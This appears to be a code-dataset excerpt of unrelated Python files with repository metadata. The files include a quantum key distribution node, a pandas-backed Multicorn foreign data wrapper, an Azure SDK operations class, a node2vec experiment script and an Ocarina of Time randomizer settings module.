] | null | null | null |
QNetwork/qkd/qkd.py
|
SwamyDev/q_network
|
4f1866f8d06e4f206b4ada5e86396a4da26f28f7
|
[
"MIT"
] | 2
|
2019-12-04T08:47:40.000Z
|
2021-07-22T16:22:27.000Z
|
import operator
import random
from abc import ABC, abstractmethod
import math
class QKDNode(ABC):
def __init__(self, ca_channel, error):
self.ca_channel = ca_channel
self.error = error
self.maximize_key_bits = False
self._qstates = []
self._other_bases = []
self._test_set = set()
self._mismatching_states = 0
def try_generate_key(self):
"""
Performs a quantum key distribution protocol to try to generate shared key between sender and receiver
:return: An empty list [] if the protocol was unsuccessful (due to eaves dropping or noise) or
An integer list (i.e.: [0, 1, 1]) of shared key
"""
self.share_q_states()
if self.should_abort():
return []
return self.generate_key()
@abstractmethod
def share_q_states(self):
pass
@abstractmethod
def should_abort(self):
pass
@abstractmethod
def generate_key(self):
pass
def _send_q_states(self, amount):
self.ca_channel.send(amount)
def _share_bases(self):
self._send_bases()
self._receive_bases()
def _send_bases(self):
self.ca_channel.send([q.basis for q in self._qstates])
def _send_test_set(self):
s = len(self._qstates)
t = s // 2
self._test_set = set(random.sample(range(0, s), t))
self.ca_channel.send(list(self._test_set))
def _send_seed(self):
m = len(self._qstates) - len(self._test_set)
self._seed = self._gen_random_string(m)
self.ca_channel.send(self._seed)
def _send_ack(self):
self.ca_channel.send_ack()
def _receive_q_states(self):
amount = self.ca_channel.receive()[0]
self._measure_qstates(amount)
@abstractmethod
def _measure_qstates(self, amount):
pass
def _receive_bases(self):
self._other_bases = self.ca_channel.receive()
def _receive_seed(self):
self._seed = self.ca_channel.receive()
def _receive_test_set(self):
self._test_set = set(self.ca_channel.receive())
def _receive_ack(self):
self.ca_channel.receive_ack()
@staticmethod
def _gen_random_string(size, up_to=1):
return [random.randint(0, up_to) for _ in range(size)]
def _calculate_matching_error_of_values(self, lhs, rhs):
t = len(lhs)
self._mismatching_states = sum(a != b for a, b in zip(lhs, rhs))
return self._mismatching_states / t
def _calc_privacy_amplification_of(self, indices):
x = [self._qstates[i].value for i in indices]
k = len(x) - self._mismatching_states if self.maximize_key_bits else 1
return self._extract_key(x, self._seed, k)
@staticmethod
def _extract_key(x, seed, k):
chunk_size = math.floor(len(x) / k)
if chunk_size == 0:
raise ValueError("The requested key ({}) is too long for the raw key ({}).".format(k, len(x)))
return [sum(map(operator.mul, xp, sp)) % 2 for xp, sp in zip(QKDNode._split_list(x, chunk_size),
QKDNode._split_list(seed, chunk_size))]
@staticmethod
def _split_list(list, size):
for i in range(0, len(list), size):
yield list[i:i+size]
| 29.848214
| 110
| 0.619503
|
08b79e1077b46c3c9746815ef84806a8346ad9ad
| 219
|
py
|
Python
|
python/high-scores/high_scores.py
|
willdjames/exercism-praticas
|
8de2fc82459c3f9e5eaff20bad4ce7a760ba786e
|
[
"MIT"
] | null | null | null |
python/high-scores/high_scores.py
|
willdjames/exercism-praticas
|
8de2fc82459c3f9e5eaff20bad4ce7a760ba786e
|
[
"MIT"
] | null | null | null |
python/high-scores/high_scores.py
|
willdjames/exercism-praticas
|
8de2fc82459c3f9e5eaff20bad4ce7a760ba786e
|
[
"MIT"
] | null | null | null |
def latest(scores):
return personal_top_three(scores)[-1]
def personal_best(scores):
return personal_top_three(scores)[0]
def personal_top_three(scores):
scores.sort(reverse=True)
return scores[0:3]
| 18.25
| 41
| 0.73516
|
2cdfdc79a5e95061d2fea1d2f8d869a6769ed8dc
| 3,139
|
py
|
Python
|
python/multicorn/pandasfdw.py
|
jbylund/Multicorn
|
47ca7c875913445ed40e03804066de1b03892814
|
[
"PostgreSQL"
] | null | null | null |
python/multicorn/pandasfdw.py
|
jbylund/Multicorn
|
47ca7c875913445ed40e03804066de1b03892814
|
[
"PostgreSQL"
] | null | null | null |
python/multicorn/pandasfdw.py
|
jbylund/Multicorn
|
47ca7c875913445ed40e03804066de1b03892814
|
[
"PostgreSQL"
] | null | null | null |
import json
import pandas as pd
from multicorn import ForeignDataWrapper
df = pd.DataFrame({
"number": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
"parity": ["even", "odd", "even", "odd", "even", "odd", "even", "odd", "even", "odd"]
})
def fake_remote_pandas_endpoint(columns=None, aggs=None, group_clauses=None):
if group_clauses is not None:
return df.groupby(group_clauses, as_index=False).agg(aggs).to_dict('records')
if aggs is not None:
# Returns {"column_1": {"avg": x, "sum": y}, "column_2": {"min": z}, ..}
return df.agg(aggs).to_dict()
return df[columns].to_dict("records")
_PG_TO_PANDAS_FUNC_MAP = {
"min": "min",
"max": "max",
"sum": "sum",
"avg": "average",
"count": "count",
}
def _convert_aggs_arg(aggs):
# Convert aggs in accordance with Pandas API:
# {"column_1": ["avg", "sum"], "column_2": ["min"], ..}
pandas_aggs = {}
for agg_props in aggs.values():
function_name = _PG_TO_PANDAS_FUNC_MAP[agg_props["function"]]
if agg_props["column"] not in pandas_aggs:
pandas_aggs[agg_props["column"]] = [function_name]
else:
pandas_aggs[agg_props["column"]].append(function_name)
return pandas_aggs
class PandasFdw(ForeignDataWrapper):
def can_pushdown_upperrel(self):
return {
"groupby_supported": True,
"agg_functions": list(_PG_TO_PANDAS_FUNC_MAP)
}
def explain(self, quals, columns, aggs=None, group_clauses=None, verbose=False):
return [
f"quals: {quals}",
f"columns: {columns}",
f"aggs: {json.dumps(aggs, indent=4)}",
f"group_clauses: {group_clauses}"
]
def execute(self, quals, columns, aggs=None, group_clauses=None):
if group_clauses is not None:
pandas_aggs = _convert_aggs_arg(aggs)
for row in fake_remote_pandas_endpoint(columns, pandas_aggs, group_clauses):
# Convert result back to Multicorn API:
# {"column_1.avg": x, "column_1.sum": y, "column2": z, ...}
result = {}
for agg_name, agg_props in aggs.items():
function_name = _PG_TO_PANDAS_FUNC_MAP[agg_props["function"]]
result[agg_name] = row[(agg_props["column"], function_name)]
for group_clause in group_clauses:
result[group_clause] = row[(group_clause, "")]
yield result
elif aggs is not None:
pandas_aggs = _convert_aggs_arg(aggs)
row = fake_remote_pandas_endpoint(columns, pandas_aggs)
# Convert result back to Multicorn API:
# {"column_1.avg": x, "column_1.sum": y, "column_2.min": z, ...}
result = {}
for agg_name, agg_props in aggs.items():
function_name = _PG_TO_PANDAS_FUNC_MAP[agg_props["function"]]
result[agg_name] = row[agg_props["column"]][function_name]
yield result
else:
for row in fake_remote_pandas_endpoint(columns):
yield row
return
| 35.269663
| 89
| 0.586811
|
08f667f696d50abad137529dcaa4beb274e5db9e
| 101
|
py
|
Python
|
tdfscrape-runner.py
|
bradsokol/tdf-scrape
|
87cc51eb3df3e953460e675b146ae1a5def36e38
|
[
"Apache-2.0"
] | null | null | null |
tdfscrape-runner.py
|
bradsokol/tdf-scrape
|
87cc51eb3df3e953460e675b146ae1a5def36e38
|
[
"Apache-2.0"
] | null | null | null |
tdfscrape-runner.py
|
bradsokol/tdf-scrape
|
87cc51eb3df3e953460e675b146ae1a5def36e38
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python
from tdfscrape.tdfscrape import main
if __name__ == '__main__':
main()
| 12.625
| 36
| 0.683168
|
3b5840049dbc45b879e276f6012678236fe451d8
| 643
|
py
|
Python
|
core/bi/dictionaries/subscriberprofile.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | null | null | null |
core/bi/dictionaries/subscriberprofile.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | null | null | null |
core/bi/dictionaries/subscriberprofile.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | null | null | null |
# ----------------------------------------------------------------------
# Interface Profile dictionary
# ----------------------------------------------------------------------
# Copyright (C) 2007-2017 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# NOC modules
from noc.core.clickhouse.dictionary import Dictionary
from noc.core.clickhouse.fields import StringField
class SubscriberProfile(Dictionary):
class Meta(object):
name = "subscriberprofile"
layout = "flat"
name = StringField()
desription = StringField()
glyph = StringField()
| 30.619048
| 72
| 0.479005
|
bf8eebcaefc930f871199f874ca7c15850f1a645
| 2,413
|
py
|
Python
|
qiskit_aqua/algorithms/components/optimizers/nlopts/crs.py
|
msoeken/aqua
|
af6a459621bcee90ed832a644ef9220644b84b03
|
[
"Apache-2.0"
] | null | null | null |
qiskit_aqua/algorithms/components/optimizers/nlopts/crs.py
|
msoeken/aqua
|
af6a459621bcee90ed832a644ef9220644b84b03
|
[
"Apache-2.0"
] | null | null | null |
qiskit_aqua/algorithms/components/optimizers/nlopts/crs.py
|
msoeken/aqua
|
af6a459621bcee90ed832a644ef9220644b84b03
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2018 IBM.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from qiskit_aqua.algorithms.components.optimizers import Optimizer
from ._nloptimizer import minimize
import logging
try:
import nlopt
except ImportError:
raise ImportWarning('nlopt cannot be imported')
logger = logging.getLogger(__name__)
class CRS(Optimizer):
"""Controlled Random Search (CRS) with local mutation
NLopt global optimizer, derivative-free
https://nlopt.readthedocs.io/en/latest/NLopt_Algorithms/#controlled-random-search-crs-with-local-mutation
"""
CRS_CONFIGURATION = {
'name': 'CRS',
'description': 'GN_CRS2_LM Optimizer',
'input_schema': {
'$schema': 'http://json-schema.org/schema#',
'id': 'crs_schema',
'type': 'object',
'properties': {
'max_evals': {
'type': 'integer',
'default': 1000
}
},
'additionalProperties': False
},
'support_level': {
'gradient': Optimizer.SupportLevel.ignored,
'bounds': Optimizer.SupportLevel.supported,
'initial_point': Optimizer.SupportLevel.required
},
'options': ['max_evals'],
'optimizer': ['global']
}
def __init__(self, configuration=None):
super().__init__(configuration or self.CRS_CONFIGURATION.copy())
def init_args(self):
pass
def optimize(self, num_vars, objective_function, gradient_function=None, variable_bounds=None, initial_point=None):
super().optimize(num_vars, objective_function, gradient_function, variable_bounds, initial_point)
return minimize(nlopt.GN_CRS2_LM, objective_function, variable_bounds, initial_point, **self._options)
| 32.608108
| 119
| 0.639039
|
c5045d6a3cba496ce6bca2e02606e1db070ca424
| 1,194
|
py
|
Python
|
21 _Software Testing Technology/suplerlists 2019.4.30/functional_tests.py
|
zhang99969/DailyLearning
|
949f94030d0b55c22bf65ba89001e0456c864c8c
|
[
"MIT"
] | 3
|
2019-01-29T15:08:47.000Z
|
2019-07-04T06:18:52.000Z
|
21 _Software Testing Technology/suplerlists 2019.4.30/functional_tests.py
|
zhang99969/DailyLearning
|
949f94030d0b55c22bf65ba89001e0456c864c8c
|
[
"MIT"
] | 5
|
2019-10-21T19:47:08.000Z
|
2021-06-10T21:32:39.000Z
|
21 _Software Testing Technology/suplerlists 2019.4.30/functional_tests.py
|
zhang99969/DailyLearning
|
949f94030d0b55c22bf65ba89001e0456c864c8c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 13 14:47:06 2019
@author: 最
"""
from selenium import webdriver
browser = webdriver.Chrome()
# Edith has heard about a cool new online to-do app. She goes
# to check out its homepage
browser.get('http://localhost:8000')
# She notices the page title and header mention to-do lists
assert 'To-Do' in browser.title, "Browser title was " + browser.title
# She is invited to enter a to-do item straight away
# She types "Buy peacock feathers" into a text box (Edith's hobby
# is tying fly-fishing lures)
# When she hits enter, the page updates, and now the page lists
# "1: Buy peacock feathers" as an item in a to-do list
# There is still a text box inviting her to add another item. She
# enters "Use peacock feathers to make a fly" (Edith is very methodical)
# The page updates again, and now shows both items on her list
# Edith wonders whether the site will remember her list. Then she sees
# that the site has generated a unique URL for her -- there is some
# explanatory text to that effect.
# She visits that URL - her to-do list is still there.
# Satisfied, she goes back to sleep
browser.quit()
| 31.421053
| 73
| 0.707705
|
2fcddd069e1e542f92bf5ce155f8059d19299802
| 806
|
py
|
Python
|
example/exampleproject/urls.py
|
terabitti/django-turbo-mixins
|
395710992b5c5704b1b0d3970838067987fe50cc
|
[
"MIT"
] | null | null | null |
example/exampleproject/urls.py
|
terabitti/django-turbo-mixins
|
395710992b5c5704b1b0d3970838067987fe50cc
|
[
"MIT"
] | null | null | null |
example/exampleproject/urls.py
|
terabitti/django-turbo-mixins
|
395710992b5c5704b1b0d3970838067987fe50cc
|
[
"MIT"
] | null | null | null |
"""exampleproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path("admin/", admin.site.urls),
path("", include("groceries.urls")),
]
| 35.043478
| 77
| 0.705955
|
1472bb7d8cdfead079fed5942a8f7342640d786e
| 1,197
|
py
|
Python
|
RecommenderSystem/exps/node2vec_exp.py
|
czx94/d2l
|
59eb899c157a772a2abe859e1aabdc5f103762dd
|
[
"MIT"
] | null | null | null |
RecommenderSystem/exps/node2vec_exp.py
|
czx94/d2l
|
59eb899c157a772a2abe859e1aabdc5f103762dd
|
[
"MIT"
] | null | null | null |
RecommenderSystem/exps/node2vec_exp.py
|
czx94/d2l
|
59eb899c157a772a2abe859e1aabdc5f103762dd
|
[
"MIT"
] | null | null | null |
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.getcwd())))
import argparse
import networkx
from utils import eval_embedding, vis_embedding, create_logger
from models import Node2Vec
from configs import cfg
def main():
parser = argparse.ArgumentParser("Node2vec training")
parser.add_argument(
"--config-file",
default="",
metavar="FILE",
help="path to config file",
type=str,
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
logger, log_path = create_logger(cfg)
logger.info(cfg)
graph = networkx.read_edgelist(cfg.DATA.GRAPH_PATH, create_using=networkx.DiGraph(), nodetype=None, data=[('weight', int)])
model = Node2Vec(graph, cfg, logger)
model.train()
embedding = model.get_embedding()
eval_embedding(embedding, cfg.DATA.LABEL_PATH, logger)
vis_embedding(embedding, cfg.DATA.LABEL_PATH, log_path)
if __name__ == '__main__':
main()
| 24.428571
| 127
| 0.680033
|
ace01d462613b9d6543b57f0e4f18b4d585fc27c
| 5,429
|
py
|
Python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_11_01/aio/operations_async/_load_balancer_network_interfaces_operations_async.py
|
LianwMS/azure-sdk-for-python
|
612d7bca9de86ee1bd1fa59291d7bf897ba9213f
|
[
"MIT"
] | 2
|
2019-05-17T21:24:53.000Z
|
2020-02-12T11:13:42.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_11_01/aio/operations_async/_load_balancer_network_interfaces_operations_async.py
|
LianwMS/azure-sdk-for-python
|
612d7bca9de86ee1bd1fa59291d7bf897ba9213f
|
[
"MIT"
] | 15
|
2019-07-12T18:18:04.000Z
|
2019-07-25T20:55:51.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_11_01/aio/operations_async/_load_balancer_network_interfaces_operations_async.py
|
LianwMS/azure-sdk-for-python
|
612d7bca9de86ee1bd1fa59291d7bf897ba9213f
|
[
"MIT"
] | 2
|
2020-05-21T22:51:22.000Z
|
2020-05-26T20:53:01.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerNetworkInterfacesOperations:
"""LoadBalancerNetworkInterfacesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
load_balancer_name: str,
**kwargs
) -> AsyncIterable["models.NetworkInterfaceListResult"]:
"""Gets associated load balancer network interfaces.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_11_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/networkInterfaces'} # type: ignore
| 47.622807
| 192
| 0.668816
|
325a3ae514def1afb662bb20c513434b9d6a3203
| 13,973
|
py
|
Python
|
Settings.py
|
Andols0/OoT-Randomizer
|
3ffbc5d8f698cdaddaa2469b2c3beb82377fbc45
|
[
"MIT"
] | null | null | null |
Settings.py
|
Andols0/OoT-Randomizer
|
3ffbc5d8f698cdaddaa2469b2c3beb82377fbc45
|
[
"MIT"
] | 1
|
2020-05-28T01:23:09.000Z
|
2020-05-28T01:23:09.000Z
|
Settings.py
|
Andols0/OoT-Randomizer
|
3ffbc5d8f698cdaddaa2469b2c3beb82377fbc45
|
[
"MIT"
] | null | null | null |
import argparse
import textwrap
import string
import re
import hashlib
import math
import sys
import json
import logging
from version import __version__
from Utils import random_choices, local_path
from SettingsList import setting_infos, get_setting_info
from Plandomizer import Distribution
class ArgumentDefaultsHelpFormatter(argparse.RawTextHelpFormatter):
def _get_help_string(self, action):
return textwrap.dedent(action.help)
# 32 characters
letters = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"
index_to_letter = { i: letters[i] for i in range(32) }
letter_to_index = { v: k for k, v in index_to_letter.items() }
def bit_string_to_text(bits):
# pad the bits array to be multiple of 5
if len(bits) % 5 > 0:
bits += [0] * (5 - len(bits) % 5)
# convert to characters
result = ""
for i in range(0, len(bits), 5):
chunk = bits[i:i + 5]
value = 0
for b in range(5):
value |= chunk[b] << b
result += index_to_letter[value]
return result
def text_to_bit_string(text):
bits = []
for c in text:
index = letter_to_index[c]
for b in range(5):
bits += [ (index >> b) & 1 ]
return bits
# holds the particular choices for a run's settings
class Settings:
def get_settings_display(self):
padding = 0
for setting in filter(lambda s: s.shared, setting_infos):
padding = max( len(setting.name), padding )
padding += 2
output = ''
for setting in filter(lambda s: s.shared, setting_infos):
name = setting.name + ': ' + ' ' * (padding - len(setting.name))
if setting.type == list:
val = ('\n' + (' ' * (padding + 2))).join(self.__dict__[setting.name])
else:
val = str(self.__dict__[setting.name])
output += name + val + '\n'
return output
def get_settings_string(self):
bits = []
for setting in filter(lambda s: s.shared and s.bitwidth > 0, setting_infos):
value = self.__dict__[setting.name]
i_bits = []
if setting.type == bool:
i_bits = [ 1 if value else 0 ]
if setting.type == str:
try:
index = setting.choice_list.index(value)
except ValueError:
index = setting.choice_list.index(setting.default)
# https://stackoverflow.com/questions/10321978/integer-to-bitfield-as-a-list
i_bits = [1 if digit=='1' else 0 for digit in bin(index)[2:]]
i_bits.reverse()
if setting.type == int:
value = int(value)
value = value - (setting.gui_params.get('min', 0))
value = int(value / (setting.gui_params.get('step', 1)))
value = min(value, (setting.gui_params.get('max', value)))
# https://stackoverflow.com/questions/10321978/integer-to-bitfield-as-a-list
i_bits = [1 if digit=='1' else 0 for digit in bin(value)[2:]]
i_bits.reverse()
if setting.type == list:
if len(value) > len(setting.choice_list) / 2:
value = [item for item in setting.choice_list if item not in value]
terminal = [1] * setting.bitwidth
else:
terminal = [0] * setting.bitwidth
item_indexes = []
for item in value:
try:
item_indexes.append(setting.choice_list.index(item))
except ValueError:
continue
item_indexes.sort()
for index in item_indexes:
item_bits = [1 if digit=='1' else 0 for digit in bin(index+1)[2:]]
item_bits.reverse()
item_bits += [0] * ( setting.bitwidth - len(item_bits) )
i_bits.extend(item_bits)
i_bits.extend(terminal)
# pad it
i_bits += [0] * ( setting.bitwidth - len(i_bits) )
bits += i_bits
return bit_string_to_text(bits)
def update_with_settings_string(self, text):
bits = text_to_bit_string(text)
for setting in filter(lambda s: s.shared and s.bitwidth > 0, setting_infos):
cur_bits = bits[:setting.bitwidth]
bits = bits[setting.bitwidth:]
value = None
if setting.type == bool:
value = True if cur_bits[0] == 1 else False
if setting.type == str:
index = 0
for b in range(setting.bitwidth):
index |= cur_bits[b] << b
value = setting.choice_list[index]
if setting.type == int:
value = 0
for b in range(setting.bitwidth):
value |= cur_bits[b] << b
value = value * setting.gui_params.get('step', 1)
value = value + setting.gui_params.get('min', 0)
if setting.type == list:
value = []
max_index = (1 << setting.bitwidth) - 1
while True:
index = 0
for b in range(setting.bitwidth):
index |= cur_bits[b] << b
if index == 0:
break
if index == max_index:
value = [item for item in setting.choice_list if item not in value]
break
value.append(setting.choice_list[index-1])
cur_bits = bits[:setting.bitwidth]
bits = bits[setting.bitwidth:]
self.__dict__[setting.name] = value
self.settings_string = self.get_settings_string()
self.numeric_seed = self.get_numeric_seed()
def get_numeric_seed(self):
# salt seed with the settings, and hash to get a numeric seed
distribution = json.dumps(self.distribution.to_json(include_output=False), sort_keys=True)
full_string = self.settings_string + distribution + __version__ + self.seed
return int(hashlib.sha256(full_string.encode('utf-8')).hexdigest(), 16)
def sanitize_seed(self):
# leave only alphanumeric and some punctuation
self.seed = re.sub(r'[^a-zA-Z0-9_-]', '', self.seed, re.UNICODE)
def update_seed(self, seed):
if seed is None or seed == '':
# https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits-in-python
self.seed = ''.join(random_choices(string.ascii_uppercase + string.digits, k=10))
else:
self.seed = seed
self.sanitize_seed()
self.numeric_seed = self.get_numeric_seed()
def update(self):
self.settings_string = self.get_settings_string()
self.numeric_seed = self.get_numeric_seed()
def load_distribution(self):
if self.enable_distribution_file:
if self.distribution_file:
try:
self.distribution = Distribution.from_file(self, self.distribution_file)
except FileNotFoundError:
logging.getLogger('').warning("Distribution file not found at %s" % (self.distribution_file))
self.enable_distribution_file = False
else:
logging.getLogger('').warning("Plandomizer enabled, but no distribution file provided.")
self.enable_distribution_file = False
elif self.distribution_file:
logging.getLogger('').warning("Distribution file provided, but using it not enabled. "
"Did you mean to set enable_distribution_file?")
else:
self.distribution = Distribution(self)
self.reset_distribution()
self.numeric_seed = self.get_numeric_seed()
def reset_distribution(self):
self.distribution.reset()
for location in self.disabled_locations:
self.distribution.add_location(location, '#Junk')
def check_dependency(self, setting_name, check_random=True):
return self.get_dependency(setting_name, check_random) == None
def get_dependency(self, setting_name, check_random=True):
info = get_setting_info(setting_name)
if check_random and 'randomize_key' in info.gui_params and self.__dict__[info.gui_params['randomize_key']]:
return info.disabled_default
elif info.dependency != None:
return info.disabled_default if info.dependency(self) else None
else:
return None
def remove_disabled(self):
for info in setting_infos:
if info.dependency != None:
new_value = self.get_dependency(info.name)
if new_value != None:
self.__dict__[info.name] = new_value
self._disabled.add(info.name)
self.settings_string = self.get_settings_string()
self.numeric_seed = self.get_numeric_seed()
def resolve_random_settings(self, cosmetic, randomize_key=None):
sorted_infos = list(setting_infos)
sort_key = lambda info: 0 if info.dependency is None else 1
sorted_infos.sort(key=sort_key)
randomize_keys_enabled = set()
for info in sorted_infos:
# only randomize cosmetics options or non-cosmetic
if cosmetic == info.shared:
continue
if self.check_dependency(info.name, check_random=True):
continue
if 'randomize_key' not in info.gui_params:
continue
if randomize_key is not None and info.gui_params['randomize_key'] != randomize_key:
continue
if self.__dict__[info.gui_params['randomize_key']]:
randomize_keys_enabled.add(info.gui_params['randomize_key'])
choices, weights = zip(*info.gui_params['distribution'])
self.__dict__[info.name] = random_choices(choices, weights=weights)[0]
# Second pass to make sure disabled settings are set properly.
# Stupid hack: disable randomize keys, then re-enable.
for randomize_keys in randomize_keys_enabled:
self.__dict__[randomize_keys] = False
for info in sorted_infos:
if cosmetic == info.shared:
continue
dependency = self.get_dependency(info.name, check_random=False)
if dependency is None:
continue
self.__dict__[info.name] = dependency
for randomize_keys in randomize_keys_enabled:
self.__dict__[randomize_keys] = True
# add the settings as fields, and calculate information based on them
def __init__(self, settings_dict):
self.__dict__.update(settings_dict)
for info in setting_infos:
if info.name not in self.__dict__:
self.__dict__[info.name] = info.default
if self.world_count < 1:
self.world_count = 1
if self.world_count > 255:
self.world_count = 255
self._disabled = set()
self.settings_string = self.get_settings_string()
self.distribution = Distribution(self)
self.update_seed(self.seed)
def to_json(self):
return {setting.name: self.__dict__[setting.name] for setting in setting_infos
if setting.shared and setting.name not in self._disabled}
def to_json_cosmetics(self):
return {setting.name: self.__dict__[setting.name] for setting in setting_infos if setting.cosmetic}
# gets the randomizer settings, whether to open the gui, and the logger level from command line arguments
def get_settings_from_command_line_args():
parser = argparse.ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('--gui', help='Launch the GUI', action='store_true')
parser.add_argument('--loglevel', default='info', const='info', nargs='?', choices=['error', 'info', 'warning', 'debug'], help='Select level of logging for output.')
parser.add_argument('--settings_string', help='Provide sharable settings using a settings string. This will override all flags that it specifies.')
parser.add_argument('--convert_settings', help='Only convert the specified settings to a settings string. If a settings string is specified output the used settings instead.', action='store_true')
parser.add_argument('--settings', help='Use the specified settings file to use for generation')
parser.add_argument('--seed', help='Generate the specified seed.')
parser.add_argument('--no_log', help='Suppresses the generation of a log file.', action='store_true')
parser.add_argument('--output_settings', help='Always outputs a settings.json file even when spoiler is enabled.', action='store_true')
args = parser.parse_args()
if args.settings == '-':
settings = Settings(json.loads(sys.stdin.read()))
else:
settingsFile = local_path(args.settings or 'settings.sav')
try:
with open(settingsFile) as f:
settings = Settings(json.load(f))
except Exception as ex:
if args.settings is None:
settings = Settings({})
else:
raise ex
settings.output_settings = args.output_settings
if args.settings_string is not None:
settings.update_with_settings_string(args.settings_string)
if args.seed is not None:
settings.update_seed(args.seed)
if args.convert_settings:
if args.settings_string is not None:
print(json.dumps(settings.to_json()))
else:
print(settings.get_settings_string())
sys.exit(0)
return settings, args.gui, args.loglevel, args.no_log
| 39.030726
| 200
| 0.600229
|
cdd8502271c2b5a9ac55c43a0ea087bc44e8296a
| 5,139
|
py
|
Python
|
tests/integration/test_projects_using_isort.py
|
jdufresne/isort
|
3ddd965c018a65d0bccfbef9af70dab6224e981d
|
[
"MIT"
] | 1,587
|
2020-08-24T03:07:20.000Z
|
2022-03-31T20:10:06.000Z
|
tests/integration/test_projects_using_isort.py
|
jdufresne/isort
|
3ddd965c018a65d0bccfbef9af70dab6224e981d
|
[
"MIT"
] | 446
|
2020-08-24T04:59:41.000Z
|
2022-03-30T21:48:34.000Z
|
tests/integration/test_projects_using_isort.py
|
jdufresne/isort
|
3ddd965c018a65d0bccfbef9af70dab6224e981d
|
[
"MIT"
] | 170
|
2020-08-25T15:09:46.000Z
|
